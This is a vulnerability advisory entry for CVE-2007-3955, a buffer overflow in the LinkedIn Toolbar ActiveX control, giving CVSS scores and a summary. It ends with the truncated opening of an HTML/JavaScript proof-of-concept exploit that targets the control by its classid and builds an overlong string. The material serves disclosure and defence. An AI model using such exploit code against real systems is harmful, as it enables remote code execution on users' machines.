6.8
CVSSv2

CVE-2007-3955

Published: 24/07/2007 Updated: 29/09/2017
CVSS v2 Base Score: 6.8 | Impact Score: 6.4 | Exploitability Score: 8.6
VMScore: 685
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in the IEToolbar.IEContextMenu.1 ActiveX control in LinkedInIEToolbar.dll in the LinkedIn Toolbar 3.0.2.1098 allows remote malicious users to execute arbitrary code via a long second argument (varBrowser argument) to the search method. NOTE: some of these details are obtained from third party information.

Vulnerable Product Search on Vulmon Subscribe to Product

linkedin toolbar 3.0.2.1098

Exploits

<HTML> <TITLE>In God We Trust, VDA Labs, LLC</TITLE> <HEAD> <object classid='clsid:0F2437D6-C4E4-42CA-A906-F506E09354B7' id='target'></object> <script language='javascript'> function repeat(n,c) { retval=""; for (i=0;i<n;i++) retval = retval + c; return retval } //EAX contains this v ...